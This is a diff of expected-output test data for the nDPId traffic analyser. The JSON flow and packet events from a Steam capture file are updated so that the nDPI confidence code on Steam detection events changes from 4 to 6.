00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1357332165166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165166,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWToAAIAROdySQpgOwKi8lWmJsmEANCG6VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA27XMEOAAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1357332165175,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165175,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTsAAIAR3ctIpT27wKi8lWmJsmEANAJdVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA5fe1HLAAAAA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1357332165187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165187,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARZ6rAqLyV0G+FVbJhaYkALIgdVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1357332165187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165187,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxrAqLyVSKU9sLJhaYoALFeMVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165187,"flow_last_seen":1357332165187,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165187,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1357332165188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165188,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxHAqLyVSKU9ubJhaYkALFeEVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1357332165188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165188,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb7AqLyVRI5bI7JhaYkALD4xVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165188,"flow_last_seen":1357332165188,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165188,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1357332165226,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165226,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTwAAIAR3dVIpT2wwKi8lWmKsmEANKPuVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAASRKpercAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1357332165229,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165229,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT0AAIAR3ctIpT25wKi8lWmJsmEANNMtVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAPeyXWaUAAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1357332165230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165230,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT4AAIAROdeSQpgPwKi8lWmKsmEANLvcVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAACGWHPF4BAAA="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1357332165237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165237,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYsALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165237,"flow_last_seen":1357332165237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165237,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qjAqLyVRRyRqrJhaYoALAcbVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx3AqLyVkkKYD7JhaYkALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxvAqLyVSKU9r7JhaYoALFeNVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1357332165243,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165243,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT8AAIARDmTQb4VUwKi8lWmJsmEANLI1VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAPGE+dlEBAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1357332165266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165266,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUAAAIARjWBFHJGqwKi8lWmKsmEANA+cVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA1CBaTb8AAAA="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1357332165270,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165270,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUEAAIAROdSSQpgPwKi8lWmLsmEANCWgVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAfF+2fVEBAAA="} @@ -177,28 +177,28 @@ 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1357332165285,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332165285,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUQAAIARxHFEjlsjwKi8lWmJsmEANM4fVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAQP0jAwIBAAA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1357332165287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332165287,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYsALBkuVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 